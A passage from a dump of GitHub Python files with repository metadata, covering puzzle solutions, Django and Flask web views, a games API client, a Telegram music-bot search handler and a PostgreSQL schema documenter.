atom_or_var(node_type[root].get(\"derived_from\", \"$_\"))\n type_int = get_unique_int()\n\n props_list = []\n props_var = \"_\"\n if \"properties\" in node_type[root]:\n if type(node_type[root][\"properties\"]) is str and is_var(node_type[root][\"properties\"]):\n props_var = atom_or_var(node_type[root][\"properties\"])\n else:\n props_var = f\"Props{type_int}\"\n props_list = build_typedef_props_list(node_type[root][\"properties\"])\n \n caps_list = []\n caps_var = \"_\"\n if \"capabilities\" in node_type[root]:\n if type(node_type[root][\"capabilities\"]) is str and is_var(node_type[root][\"capabilities\"]):\n caps_var = atom_or_var(node_type[root][\"capabilities\"])\n else:\n caps_var = f\"Caps{type_int}\"\n for cname, cdict in node_type[root][\"capabilities\"].items():\n assert list(cdict) == [\"type\"], \\\n \"Capability in node type must have exactly one key: 'type'.\"\n cname = atom_or_var(cname)\n ctype = atom_or_var(cdict[\"type\"])\n caps_list.append(f\"capability({cname}, {ctype})\")\n\n reqs_list = []\n reqs_var = \"_\"\n if \"requirements\" in node_type[root]:\n if type(node_type[root][\"requirements\"]) is str and is_var(node_type[root][\"requirements\"]):\n reqs_var = atom_or_var(node_type[root][\"requirements\"])\n else:\n reqs_var = f\"Reqs{type_int}\"\n for req in node_type[root][\"requirements\"]:\n rname, rdict = list(req.items())[0]\n rname = atom_or_var(rname)\n req_cap = atom_or_var(rdict.get(\"capability\", \"$_\"))\n req_node = atom_or_var(rdict.get(\"node\", \"$_\"))\n req_rel = atom_or_var(rdict.get(\"relationship\", \"$_\"))\n occ = rdict.get(\"occurrences\")\n if occ is None:\n req_occ = \"_\"\n elif type(occ) is str and is_var(occ):\n req_occ = atom_or_var(occ)\n else:\n occ_lb = occ[0]\n if type(occ_lb) is str and is_var(occ_lb):\n occ_lb = atom_or_var(occ_lb)\n occ_ub = occ[1]\n if type(occ_ub) is str and is_var(occ_ub):\n occ_ub = atom_or_var(occ_ub)\n elif occ_ub == \"UNBOUNDED\":\n occ_ub = \"unbounded\"\n req_occ = f\"occurrences({occ_lb}, {occ_ub})\"\n reqs_list.append(f\"requirement({rname}, {req_cap}, {req_node}, {req_rel}, {req_occ})\")\n preds = [f\"node_type({type_name}, {derived_from}, {props_var}, {caps_var}, {reqs_var})\"]\n if props_list:\n preds.append(f\"subset([{', '.join(props_list)}], {props_var})\")\n if caps_list:\n preds.append(f\"subset([{', '.join(caps_list)}], {caps_var})\")\n if reqs_list:\n preds.append(f\"subset([{', '.join(reqs_list)}], {reqs_var})\")\n return \", \".join(preds)\n\n\ndef build_cap_type_pred(cap_type) -> str:\n cap_type_struct_err = \"\"\"capability type must have structure:\n :\n [derived_from: ]\n [properties: | $var]\"\"\"\n \n assert type(cap_type) is dict and len(cap_type) == 1, cap_type_struct_err\n root = list(cap_type)[0]\n type_name = atom_or_var(root)\n assert type(cap_type[root]) is dict, cap_type_struct_err\n derived_from = atom_or_var(cap_type[root].get(\"derived_from\", \"$_\"))\n type_int = get_unique_int()\n\n props_list = []\n props_var = \"_\"\n if \"properties\" in cap_type[root]:\n if type(cap_type[root][\"properties\"]) is str and is_var(cap_type[root][\"properties\"]):\n props_var = atom_or_var(cap_type[root][\"properties\"])\n else:\n props_var = f\"Props{type_int}\"\n props_list = build_typedef_props_list(cap_type[root][\"properties\"])\n\n preds = [f\"cap_type({type_name}, {derived_from}, {props_var})\"]\n if props_list:\n preds.append(f\"subset([{', '.join(props_list)}], {props_var})\")\n return \", \".join(preds)\n\n\ndef build_policy_pred(pol) -> str:\n pol_struct_err = \"\"\"Node must have structure:\n :\n [type: ]\n [targets: [] | $var]\"\"\"\n\n assert type(pol) is dict and len(pol) == 1, pol_struct_err\n root = list(pol)[0]\n pol_name = atom_or_var(root)\n assert type(pol[root]) is dict, pol_struct_err\n pol_type = atom_or_var(pol[root].get(\"type\", \"$_\"))\n pol_int = get_unique_int()\n\n tgts_list = []\n tgts_var = \"_\"\n if \"targets\" in pol[root]:\n if type(pol[root][\"targets\"]) is str and is_var(pol[root][\"targets\"]):\n tgts_var = atom_or_var(pol[root][\"targets\"])\n else:\n tgts_var = f\"Tgts{pol_int}\"\n tgts_list = [atom_or_var(t) for t in pol[root][\"targets\"]]\n\n preds = [f\"policy({pol_name}, {pol_type}, {tgts_var})\"]\n if tgts_list:\n preds.append(f\"subset([{', '.join(tgts_list)}], {tgts_var})\")\n return \", \".join(preds)\n\n\ndef build_formula_term(formula) -> str:\n assert type(formula) is dict and len(formula) == 1, \\\n \"Every formula must be a dictionary with one key\"\n root = list(formula)[0]\n op_s = formula[root]\n if root == \"and\":\n assert type(op_s) is list, \"'and' connective requires a list of formulas\"\n return \", \".join(build_formula_term(op) for op in op_s)\n elif root == \"or\":\n assert type(op_s) is list, \"'or' connective requires a list of formulas\"\n return \"(\" + \"; \".join(build_formula_term(op) for op in op_s) + \")\"\n elif root == \"not\":\n return \"\\\\+ (\" + build_formula_term(op_s) + \")\"\n elif root == \"match\":\n assert type(op_s) is list and len(op_s) == 2, \"'match' requires two arguments\"\n return build_term(op_s[0]) + \" = \" + build_term(op_s[1])\n elif root == \"predicate\":\n assert type(op_s) is dict and len(op_s) == 1, \"'predicate' requires a single dict term\"\n return build_term(op_s)\n elif root == \"node\":\n return build_node_pred(op_s)\n elif root == \"node_type\":\n return build_node_type_pred(op_s)\n elif root == \"capability_type\":\n return build_cap_type_pred(op_s)\n elif root == \"policy\":\n return build_policy_pred(op_s)\n else:\n return \"unsupported\"\n\n\ndef fmt_result(res) -> str:\n if type(res) is pyswip.Atom:\n return res.value\n elif type(res) is list:\n return \"[\" + \", \".join([fmt_result(r) for r in res]) + \"]\"\n elif type(res) is bytes:\n return res.decode('UTF-8')\n else:\n return str(res)","repo_name":"mikidep/piacere-formal-verification","sub_path":"doml_tosca_poc/check2swipl.py","file_name":"check2swipl.py","file_ext":"py","file_size_in_byte":12197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10830122229","text":"import numpy as np\n\n\ndef searchOccupied(matrix, rows, cols, curr_row, curr_col, delta_row, delta_col):\n '''\n This function moves in the matrix in the direction given by the deltas:\n\n -1,-1 -1,0 -1,+1\n\n 0,-1 x 0,+1\n\n +1,-1 +1,0 +1,+1\n\n and returns 1 if the first seat it finds is a \"#\", otherwise 0\n\n '''\n search_row = curr_row + delta_row\n search_col = curr_col + delta_col\n\n while (search_row >= 0 and search_row < rows) and (search_col >= 0 and search_col < cols):\n if matrix[search_row][search_col] == \"#\":\n return 1\n elif matrix[search_row][search_col] == \"L\":\n return 0\n search_row += delta_row\n search_col += delta_col\n\n return 0\n\n\ndef newRound(old_matrix, rows, cols):\n newMatrix = np.copy(old_matrix)\n for cur_row in range(rows):\n for cur_col in range(cols):\n\n occupied_seats = 0\n for delta_row, delta_col in [[-1, -1], [-1, 0], [-1, +1], [0, -1], [0, +1], [+1, -1], [+1, 0], [+1, +1]]:\n occupied_seats += searchOccupied(matrix, rows, cols, cur_row, cur_col, delta_row, delta_col)\n\n if old_matrix[cur_row][cur_col] == \"L\":\n if occupied_seats == 0:\n newMatrix[cur_row][cur_col] = \"#\"\n elif old_matrix[cur_row][cur_col] == \"#\":\n if occupied_seats >= 5:\n newMatrix[cur_row][cur_col] = \"L\"\n\n return newMatrix\n\n\n''' Open file '''\nfilename = 'input.txt'\nwith open(filename) as f:\n content = f.readlines()\n\nrows = len(content)\n# Not counting the \\n\ncols = len(content[0]) - 1\n\nmatrix = np.array([])\nfor line_dirty in content:\n line = line_dirty.replace(\"\\n\", \"\")\n matrix = np.append(matrix, list(line))\nmatrix = matrix.reshape(rows, cols)\n\nnewMatrix = np.array([])\nwhile True:\n newMatrix = newRound(matrix, rows, cols)\n if (newMatrix == matrix).all():\n # This round didn't change the matrix\n break\n matrix = newMatrix.copy()\n\nmatrix_into_array = np.array(matrix).reshape(-1)\noccupied_seats = np.shape(np.where(matrix_into_array == \"#\"))[1]\n\nprint(\"There are \" + str(occupied_seats) + \" occupied seats\")","repo_name":"AndreaBruno97/AdventOfCode2020_python","sub_path":"day_11/puzzle_2.py","file_name":"puzzle_2.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41458289979","text":"#\n# @lc app=leetcode id=893 lang=python3\n#\n# [893] Groups of Special-Equivalent Strings\n#\n\n# @lc code=start\n\nfrom collections import Counter\n\n\nclass Solution:\n def numSpecialEquivGroups(self, words: List[str]) -> int:\n\n if not len(words):\n return 0\n\n result = set()\n\n for w in words:\n\n current = ''.join(sorted(w[1::2])+sorted(w[::2]))\n result.add(current)\n\n return len(result)\n\n# @lc code=end\n","repo_name":"HOZH/leetCode","sub_path":"leetCodePython2020/893.groups-of-special-equivalent-strings.py","file_name":"893.groups-of-special-equivalent-strings.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"28412088476","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: A Tree\n @return: Preorder in ArrayList which contains node values.\n \"\"\"\n def preorderTraversal(self, root):\n # using current pointer \n current = root \n result, stack = [], []\n while len(stack) > 0 or current is not None:\n if current is not None:\n result.append(current.val)\n stack.append(current)\n current = current.left \n \n else:\n current = stack.pop()\n current = current.right \n \n return result\n","repo_name":"KunyiLiu/algorithm_problems","sub_path":"kunyi/Tree/binary_tree_preorder_traversal.py","file_name":"binary_tree_preorder_traversal.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8251929207","text":"# File: Chess.py\n\n# Description: Find the number of solutions to N-Queens problem.\n\n# Student Name: Alicia Ireland\n\n# Student UT EID: ani324\n\n# Partner Name:\n\n# Partner UT EID:\n\n# Course Name: CS 313E\n\n# Unique Number: 50845\n\n# Date Created: 10/22/2020\n\n# Date Last Modified:10/22/2020\nimport sys\n\nclass Queens (object):\n def __init__ (self, n):\n self.count = 0\n self.board = []\n self.n = n\n for i in range (self.n):\n row = []\n for j in range (self.n):\n row.append ('*')\n self.board.append (row)\n# check if a position on the board is valid\n def is_valid (self, row, col):\n for i in range (self.n):\n if (self.board[row][i] == 'Q') or (self.board[i][col] == 'Q'):\n return False\n for i in range (self.n):\n for j in range (self.n):\n row_diff = abs (row - i)\n col_diff = abs (col - j)\n if (row_diff == col_diff) and (self.board[i][j] == 'Q'):\n return False\n return True\n\n\n # do the recursive backtracking\n def recursive_solve (self, col):\n if (col == self.n):\n self.count += 1\n return\n else:\n for i in range (self.n):\n if (self.is_valid (i, col)):\n self.board[i][col] = 'Q'\n self.recursive_solve(col + 1)\n self.board[i][col] = '*' \n return self.count \ndef main():\n # read the size of the board\n line = sys.stdin.readline()\n line = line.strip()\n n = int (line)\n\n # create a chess board\n\n game = Queens (n)\n\n print(game.recursive_solve(0))\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"alicianireland/CS313E","sub_path":"Chess.py","file_name":"Chess.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12371034924","text":"\"\"\"onlineadmin URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\n\nfrom app import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path(\"\",views.Adminloginpage,name=\"admin\"),\n path(\"logindetails/\",views.logindetails,name=\"logindetails\"),\n path(\"merchentdetails/\",views.merchant,name=\"merchant\"),\n path(\"savemerchent/\",views.savemerchent,name=\"savemerchent\"),\n path(\"viewmerchent/\",views.viewmerchent,name=\"viewmerchent\"),\n path(\"delete/\",views.delete,name=\"delete\"),\n\n path('merchant/',views.Merchentlog.as_view()),\n path(\"addd/\",views.Productsave.as_view()),\n path(\"viewdata/\",views.Viewdata.as_view()),\n path('update//',views.Update.as_view()),\n path(\"saveupdate//\",views.Saveupdate.as_view()),\n path(\"deletee//\",views.Delete.as_view())\n]\n","repo_name":"yagnapravallika/onlinessalesapplication-merchantapplication","sub_path":"onlinesales/onlineadmin/onlineadmin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33618562049","text":"from flask import Flask, Blueprint, make_response\nfrom flask import request, redirect\nimport databaseOperation as crud\nfrom flask import session\nimport json\n\nloginSignUp = Blueprint('loginSignUp', __name__)\n\n\n@loginSignUp.route('/login', methods = ['POST'])\ndef login():\n if request.method == 'POST':\n if not session['loggedIn']:\n # Verifiying the CSRF Token\n if request.headers['CSRFToken'] == session['CSRFToken']:\n loginData = json.loads(request.data.decode())\n userData = crud.get_User(loginData['email'])\n\n if userData:\n if crud.verify_UserPassword(loginData['email'], loginData['password']):\n # User Successfully Signed In\n session['name'] = userData.name\n session['email'] = userData.email\n session['loggedIn'] = True\n\n response = make_response()\n response.headers['Content'] = json.dumps({\n 'loggedIn': True\n })\n return response, 200\n else:\n # Invalid Email or Password\n response = make_response()\n response.headers['Content'] = json.dumps({\n 'response': 'Invalid Email or Password'\n })\n return response, 401\n else:\n # If CSRF Verification fails\n response = make_response()\n response.headers['Content'] = json.dumps({\n 'response': 'Invalid Token'\n })\n return response, 400\n \n # Redirect User If already Logged In\n return redirect('/')\n\n@loginSignUp.route('/signUp', methods = ['POST'])\ndef signUp():\n if request.method == 'POST':\n if not session['loggedIn']:\n # Verifiying the CSRF Token\n if request.headers['CSRFToken'] == session['CSRFToken']:\n signUpData = json.loads(request.data.decode())\n\n if crud.add_SignUp(signUpData):\n # User Successfully Added and Signed In\n session['name'] = signUpData['name']\n session['email'] = signUpData['email']\n session['loggedIn'] = True\n\n response = make_response()\n response.headers['Content'] = json.dumps({\n 'loggedIn': True\n })\n return response, 200\n else:\n # User Already Exist\n response = make_response()\n response.headers['Content'] = json.dumps({\n 'response': 'User Already Exist'\n })\n return response, 409\n else:\n # If CSRF Verification fails\n response = make_response()\n response.headers['Content'] = json.dumps({\n 'response': 'Invalid Token'\n })\n return response, 400\n \n # Redirect User If already Logged In\n return redirect('/')\n\n@loginSignUp.route('/logout')\ndef logout():\n if session['loggedIn']:\n del session['name']\n del session['email']\n session['loggedIn'] = False\n return redirect('/')\n","repo_name":"aditsrivastava4/chat-app","sub_path":"src/loginSignUp/LoginSighUp.py","file_name":"LoginSighUp.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18716163795","text":"import json\nimport requests\nfrom datetime import datetime\nfrom django.conf import settings\nfrom django.utils.datastructures import MultiValueDictKeyError\nfrom rest_framework.decorators import api_view\nfrom rest_framework.exceptions import NotFound\nfrom rest_framework.response import Response\nfrom actions.models import Ratings\nfrom actions.serializers import RatingSerializer\nfrom .fields import game_fields, search_fields, company_fields, company_logo_fields, company_game_fields, popular_fields, backdrop_fields, genre_fields, recents_fields, upcoming_fields\nfrom .models import Game\n\n\n@api_view(['GET'])\ndef get_genres(request):\n \"\"\"Get list of all genres\n Makes call to https://api.igdb.com/v4/genres with maximum limit and no params\n \"\"\"\n data = f'fields {genre_fields}; limit 50;'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='genres')\n r = requests.post(url=url, data=data, headers=headers).json()\n\n return Response(r)\n \n@api_view(['GET'])\ndef get_games(request):\n \"\"\"Get a list of games from IGDB.\n\n Makes a call to the `https://api.igdb.com/v4/games` endpoint, specifying the\n fields (defined as `game_fields` in fields.py) and game IDs in the POST data.\n \n For more details read https://api-docs.igdb.com/?javascript#game.\n\n Args:\n slugs: a list of unique name of the game e.g. dark-souls, prey, prey--1. maximum of 10 per request\n\n Returns:\n game: a JSON response containing a list of the details of the games.\n \"\"\"\n slugs = request.GET['slugs']\n slugs = (\",\").join([f'\"{x}\"' for x in slugs.split(\",\")][:10])\n \n data = f'fields {game_fields}; where slug=({slugs});'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers).json()\n\n if not r:\n raise NotFound(detail='Game not found.')\n\n return Response(r)\n\n@api_view(['GET'])\ndef get_game(request, slug):\n \"\"\"Get a game from IGDB.\n\n Makes a call to the `https://api.igdb.com/v4/games` endpoint, specifying the\n fields (defined as `game_fields` in fields.py) and game ID in the POST data.\n \n For more details read https://api-docs.igdb.com/?javascript#game.\n\n Args:\n slug: unique name of the game e.g. dark-souls, prey, prey--1.\n\n Returns:\n game: a JSON response containing the details of a game.\n \"\"\"\n data = f'fields {game_fields}; where slug=\"{slug}\";'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers).json()\n\n if not r:\n raise NotFound(detail='Game not found.')\n\n return Response(r)\n\n\n@api_view(['GET'])\ndef search_game(request, name):\n \"\"\"Search a game based on a name.\n \n Calls `https://api.igdb.com/v4/games` specifying the search term in the\n POST data. The search term must be a string, the name of the game. The\n fields shown in the results are defined in `search_fields` from fields.py.\n \n For more details on how to search the IGDB API, read \n https://api-docs.igdb.com/?javascript#search-176.\n\n Args:\n name: the search term, name of the desired game.\n\n Returns:\n games: a JSON containing a list of search results.\n \"\"\"\n data = f'fields {search_fields}; search \"{name}\";'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers)\n\n return Response(r.json())\n\n\n@api_view(['GET'])\ndef get_frontpage_games(request):\n \"\"\"Gets a set of recently released games and upcoming games from today.\"\"\"\n \n now = int(datetime.timestamp(datetime.now()))\n recents_query = f'fields {recents_fields}; sort first_release_date desc; where first_release_date < {now};'\n upcoming_query = f'fields {upcoming_fields}; sort first_release_date asc; where first_release_date > {now} & release_dates.category = 0;'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='games')\n\n recents = requests.post(url=url, data=recents_query, headers=headers)\n upcoming = requests.post(url=url, data=upcoming_query, headers=headers)\n r = {'recents': recents.json(), 'upcoming': upcoming.json()}\n return Response(r) \n\ndef get_company_logo(id):\n \"\"\"Gets company logo.\"\"\"\n \n query = f'fields {company_logo_fields}; where id = {id};'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='company_logos')\n\n return requests.post(url=url, data=query, headers=headers).json()\n\ndef get_games_by_company(cid):\n \"\"\"Gets games created by a particular company.\"\"\"\n \n query = f'fields {company_game_fields}; where involved_companies.company = {cid} & involved_companies.developer = true;'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='games')\n\n return requests.post(url=url, data=query, headers=headers).json()\n\n@api_view(['GET'])\ndef get_company(request, cid):\n \"\"\"Gets Company/Creator of games from IGDB.\"\"\"\n \n query = f'fields {company_fields}; where id = {cid};'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='companies')\n\n company_json = requests.post(url=url, data=query, headers=headers).json()\n\n company_json[0]['logo_details'] = get_company_logo(company_json[0]['logo'])\n\n games_json = get_games_by_company(cid)\n\n r = {'company': company_json, 'games': games_json}\n\n return Response(r) \n\n@api_view(['GET'])\ndef get_popular_games(request):\n \"\"\"Gets popular or trending games.\n \n Calls the `games` endpoint, sorting the results by popularity (desc).\n This endpoint is called in Overworld's landing page. An example of this\n is documented on IGDB https://api-docs.igdb.com/?javascript#examples-12. \n\n Takes limit parameter with max of 50, min 1 and default of 6 if not passed\n Returns:\n games: games sorted by popularity.\n \"\"\"\n \n\n #get parameters with defaults and check bounds\n limit = int(request.GET.get(\"limit\", 6)) \n limit = limit if limit < 50 and limit > 0 else 6 \n\n offset = int(request.GET.get(\"offset\", 0))\n offset = offset if offset >= 0 and offset < 150 else 0\n\n filters = request.GET.get(\"filters\", '{}')\n filters = json.loads(filters)\n\n adultContent = request.GET.get(\"adultContent\", False)\n\n conditions = \"\"\n\n if 'genre' in filters and len(filters['genre']):\n ids = tuple([x['id'] for x in filters['genre']]) if len(filters['genre']) > 1 else filters['genre'][0]['id'] #create list of id's in format required by IGDB api\n conditions += f\"where genres={ids};\"\n \n if 'date' in filters and len(filters['date']):\n if filters['date'][0]:\n conditions += f\"where release_date.date <= {filters['date'][0]['utc']};\"\n if filters['date'][1]:\n conditions += f\"where release_date.date >= {filters['date'][1]['utc']};\"\n\n if 'developer' in filters and len(filters['developer']):\n pass\n\n if not adultContent:\n data = f'fields {popular_fields}; where date < 1538129353; sort date desc; limit {limit}; offset {offset};' + conditions\n print(data)\n if adultContent:\n data = f'fields {popular_fields}; sort follows asc; limit {limit}; offset {offset};' + conditions\n\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='release_dates')\n r = requests.post(url=url, data=data, headers=headers)\n\n return Response(r.json())\n\n\n@api_view(['GET'])\ndef get_backdrop(request, guid):\n \"\"\"Gets the background image for the landing page.\n \n Makes a call to `https://api.igdb.com/v4/games`, with image-related fields\n only. The game the backdrop is selected from is randomly selected in the \n frontend.\n\n Args:\n guid: ID of the game.\n\n Returns:\n backdrop: a JSON object with the image IDs necessary for the backdrop.\n \"\"\"\n data = f'fields {backdrop_fields}; where id={guid};'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers)\n\n return Response(r.json())\n\n\n@api_view(['GET'])\ndef get_game_ratings(request, slug):\n \"\"\"Endpoint for getting ratings for a game.\n\n Supports only GET.\n\n Args:\n slug: slugified name of a game (unique)\n Returns:\n data: [{game, user_id, rating}...]\n \"\"\"\n try:\n game = Game.objects.get(slug=slug)\n ratings = Ratings.objects.filter(game=game)\n serializer = RatingSerializer(ratings, many=True).data\n return Response(serializer)\n except:\n raise NotFound(detail='Game does not have rating.')\n \n ","repo_name":"danielgrijalva/overworld","sub_path":"backend/games/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9221,"program_lang":"python","lang":"en","doc_type":"code","stars":120,"dataset":"github-code","pt":"72"} +{"seq_id":"16023083745","text":"from dataclasses import dataclass\r\nfrom random import randint\r\n\r\n@dataclass\r\nclass DiceFactory:\r\n name: str\r\n value: int\r\n save: bool = False\r\n \r\n def roll(self):\r\n self.value = randint(1,6)\r\n \r\n def save(self):\r\n self.save == True\r\n\r\ndef main():\r\n dice=create_dice()\r\n roll_again = \"y\"\r\n score = 0\r\n roll = 0\r\n while roll_again == \"y\" and roll <3:\r\n roll +=1\r\n roll_dice(dice)\r\n d2p=get_dice(dice)\r\n print(f\"{'='*21}\\n {d2p}\\n{'='*21}\")\r\n print(f\"Number of rolls: {roll}\")\r\n dice, score = check_dice(dice, score) \r\n if roll <3: \r\n roll_again = input(\"\\nPress 'Y' to roll the dice again: \").lower()\r\n if score == 0:\r\n print(f\"\\nYou failed to secure as Captain, Ship and Cargo and are left with {score} gold.\\n\")\r\n else:\r\n print(f\"\\n{'='*28}\\n Final Cargo Value: {score} gold\\n{'='*28}\\n\") \r\n return\r\n\r\ndef check_dice(dice, score):\r\n current_roll = []\r\n current_roll.clear()\r\n for i in range(5):\r\n current_roll.append(dice[i].value)\r\n \r\n if 6 in current_roll:\r\n print(f\"\\n[6] A Captain has been found!\")\r\n dice[0].value = 6\r\n dice[0].save = True\r\n \r\n if 6 in current_roll and 5 in current_roll:\r\n print(f\"[5] The Captain has secured a ship!\")\r\n dice[1].value = 5\r\n dice[1].save = True\r\n \r\n if 6 in current_roll and 5 in current_roll and 4 in current_roll:\r\n score = sum(current_roll)-15\r\n print(\"[4] The Captain has hired a crew!\")\r\n if score == 12:\r\n print(f\"\\nCurrent cargo is worth {score}, thats the largest hual I've ever seen!\")\r\n else:\r\n print(f\"\\nCurrent cargo of barrells is worth {score} gold!\")\r\n dice[2].value = 4\r\n dice[2].save = True\r\n return dice, score\r\n \r\ndef roll_dice(dice):\r\n for i in range(5):\r\n if dice[i].save == False:\r\n dice[i].roll()\r\n return dice\r\n\r\ndef get_dice(dice):\r\n d2p = \"\"\r\n for i in range(5):\r\n d2p += (f\"[{dice[i].value}] \")\r\n return d2p\r\n\r\ndef create_dice(): \r\n dice=[]\r\n for i in range(5):\r\n dice.append(DiceFactory(f\"d{i+1}\",0,False))\r\n dice[i].roll()\r\n return dice\r\n\r\nif __name__ == \"__main__\":\r\n main() ","repo_name":"QubeUK/Dice","sub_path":"dice_class.py","file_name":"dice_class.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"922814480","text":"from pyrogram.types import (InlineKeyboardButton,\n InlineKeyboardMarkup,\n InlineQueryResultPhoto)\nfrom youtubesearchpython.__future__ import VideosSearch\n\nfrom config import BANNED_USERS, MUSIC_BOT_NAME\nfrom Musikku import app\nfrom Musikku.utils.inlinequery import answer\n\n\n@app.on_inline_query(~BANNED_USERS)\nasync def inline_query_handler(client, query):\n text = query.query.strip().lower()\n answers = []\n if text.strip() == \"\":\n try:\n await client.answer_inline_query(\n query.id, results=answer, cache_time=10\n )\n except:\n return\n else:\n a = VideosSearch(text, limit=20)\n result = (await a.next()).get(\"result\")\n for x in range(15):\n title = (result[x][\"title\"]).title()\n duration = result[x][\"duration\"]\n views = result[x][\"viewCount\"][\"short\"]\n thumbnail = result[x][\"thumbnails\"][0][\"url\"].split(\"?\")[\n 0\n ]\n channellink = result[x][\"channel\"][\"link\"]\n channel = result[x][\"channel\"][\"name\"]\n link = result[x][\"link\"]\n published = result[x][\"publishedTime\"]\n description = f\"{views} | {duration} Mins | {channel} | {published}\"\n buttons = InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"🎥 Nonton Di Youtube\",\n url=link,\n )\n ],\n ]\n )\n searched_text = f\"\"\"\n❇️**Judul:** [{title}]({link})\n\n⏳**Durasi:** {duration} Menit\n👀**Penonton:** `{views}`\n⏰**Waktu Publikasi:** {published}\n🎥**Nama Channel:** {channel}\n📎**Tautan Channel:** [Kunjungi Dari Sini]({channellink})\n\n__Balas dengan /play pada pesan yang dicari ini untuk mengalirkannya di obrolan suara.__\n\n⚡️ ** Pencarian Inline Oleh {MUSIC_BOT_NAME} **\"\"\"\n answers.append(\n InlineQueryResultPhoto(\n photo_url=thumbnail,\n title=title,\n thumb_url=thumbnail,\n description=description,\n caption=searched_text,\n reply_markup=buttons,\n )\n )\n try:\n return await client.answer_inline_query(\n query.id, results=answers\n )\n except:\n return\n","repo_name":"EmiliaTzy/Musikku","sub_path":"Musikku/plugins/bot/inline.py","file_name":"inline.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"13009283155","text":"'''DB description module'''\n\nimport copy\nimport psycopg2\nfrom pgdocgen.ddlobject.ddlobject import DDLObject\n\n\nclass DB(DDLObject):\n '''DB schema class'''\n conn = None\n contents = []\n\n def connect(self, db_connection_string):\n '''Make db connection'''\n self.conn = psycopg2.connect(db_connection_string)\n\n def read_contents(self):\n '''Read all schemas in database'''\n cur = self.conn.cursor()\n cur.execute('''select nspname,\n description\n from pg_catalog.pg_namespace s\n left join pg_catalog.pg_description d\n on (d.objoid = s.oid)\n where s.nspname not like 'pg\\_%' and\n s.nspname <> 'information_schema'\n order by s.nspname''')\n schemas = cur.fetchall()\n cur.close()\n from pgdocgen.ddlobject.schema import Schema\n for (schema, comment) in [(x[0], x[1]) for x in schemas]:\n schema_obj = Schema(schema, comment, self.conn)\n self.contents.append(copy.deepcopy(schema_obj))\n self.conn.close()\n\n def __init__(self, db_connection_string):\n '''DB constructor'''\n self.contents = []\n self.object_type = 'database'\n self.connect(db_connection_string)\n self.read_contents()\n","repo_name":"C-Pro/pgdocgen","sub_path":"pgdocgen/ddlobject/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"29752502209","text":"\"\"\"PhotoPage URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include, patterns\nfrom 